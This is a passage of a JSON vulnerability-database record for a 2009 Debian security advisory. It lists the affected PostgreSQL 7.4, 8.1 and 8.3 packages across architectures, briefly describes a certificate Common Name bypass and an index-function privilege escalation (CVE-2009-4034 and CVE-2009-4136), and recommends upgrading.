"libpq4_8.1.19-0etch1_alpha.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_mips.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27.orig", "arch": "src", "packageFilename": "postgresql-7.4_7.4.27.orig.tar.gz", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libpgtypes2_8.1.19-0etch1_mips.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libpgtypes3_8.3.9-0lenny1_arm.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_i386.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "libpgtypes2_8.1.19-0etch1_alpha.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libecpg-dev_8.1.19-0etch1_amd64.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libecpg6_8.3.9-0lenny1_alpha.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_s390.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_hppa.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_ia64.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libecpg-compat2_8.1.19-0etch1_mips.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "src", "packageFilename": "postgresql-8.1_8.1.19-0etch1.dsc", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libpq-dev_8.3.9-0lenny1_powerpc.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libpq5_8.3.9-0lenny1_arm.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libpq4_8.1.19-0etch1_s390.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libpgtypes2_8.1.19-0etch1_mipsel.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "all", "packageFilename": "postgresql-server-dev-7.4_7.4.27-0etch1_all.deb", "packageName": "postgresql-server-dev-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libpq5_8.3.9-0lenny1_mips.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libpq4_8.1.19-0etch1_mipsel.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libpq-dev_8.1.19-0etch1_hppa.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libecpg-dev_8.3.9-0lenny1_alpha.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libecpg6_8.3.9-0lenny1_i386.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libpq4_8.1.19-0etch1_ia64.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libpq-dev_8.1.19-0etch1_ia64.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libpq-dev_8.3.9-0lenny1_hppa.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libecpg-dev_8.1.19-0etch1_mipsel.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libpgtypes3_8.3.9-0lenny1_ia64.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libecpg5_8.1.19-0etch1_s390.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libpq-dev_8.1.19-0etch1_sparc.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libpgtypes2_8.1.19-0etch1_s390.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libecpg6_8.3.9-0lenny1_arm.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libpq-dev_8.3.9-0lenny1_ia64.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libpgtypes2_8.1.19-0etch1_i386.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libecpg-compat2_8.1.19-0etch1_amd64.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libpq-dev_8.3.9-0lenny1_mipsel.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ia64", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_ia64.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libpq5_8.3.9-0lenny1_armel.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libecpg6_8.3.9-0lenny1_s390.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libecpg-dev_8.3.9-0lenny1_armel.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libpgtypes3_8.3.9-0lenny1_hppa.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libecpg5_8.1.19-0etch1_mips.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "all", "packageFilename": "postgresql_8.3.9-0lenny1_all.deb", "packageName": "postgresql", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libpq4_8.1.19-0etch1_sparc.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libecpg-compat2_8.1.19-0etch1_s390.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libecpg5_8.1.19-0etch1_amd64.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "src", "packageFilename": "postgresql-8.3_8.3.9-0lenny1.dsc", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_arm.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libpq-dev_8.3.9-0lenny1_i386.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libpq5_8.3.9-0lenny1_sparc.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "src", "packageFilename": "postgresql-7.4_7.4.27-0etch1.dsc", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "libpq5_8.3.9-0lenny1_hppa.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "all", "packageFilename": "postgresql-client_8.3.9-0lenny1_all.deb", "packageName": "postgresql-client", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libecpg-dev_8.3.9-0lenny1_mipsel.deb", "packageName": "libecpg-dev", "operator": "lt"}], "description": "Several vulnerabilities have been discovered in PostgreSQL, a database server. The Common Vulnerabilities and Exposures project identifies the following problems:\n\nIt was discovered that PostgreSQL did not properly verify the Common Name attribute in X.509 certificates, enabling attackers to bypass the (optional) TLS protection on client-server connections, by relying on a certificate from a trusted CA which contains an embedded NUL byte in the Common Name ([CVE-2009-4034](<https://security-tracker.debian.org/tracker/CVE-2009-4034>)).\n\nAuthenticated database users could elevate their privileges by creating specially-crafted index functions ([CVE-2009-4136](<https://security-tracker.debian.org/tracker/CVE-2009-4136>)).\n\nThe following matrix shows fixed source package versions for the respective distributions.\n\n| oldstable/etch | stable/lenny | testing/unstable \n---|---|---|--- \npostgresql-7.4 | 7.4.27-0etch1 | | \npostgresql-8.1 | 8.1.19-0etch1 | | \npostgresql-8.3 | | 8.3.9-0lenny1 | 8.3.9-1 \npostgresql-8.4 | | | 8.4.2-1 \n \nIn addition to these security fixes, the updates contain reliability improvements and fix other defects.\n\nWe recommend that you upgrade your PostgreSQL packages.", "edition": 1, "reporter": "Debian", "published": "2009-12-31T00:00:00", "title": "postgresql-7.4, postgresql-8.1, postgresql-8.3 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2009-12-31T00:00:00", 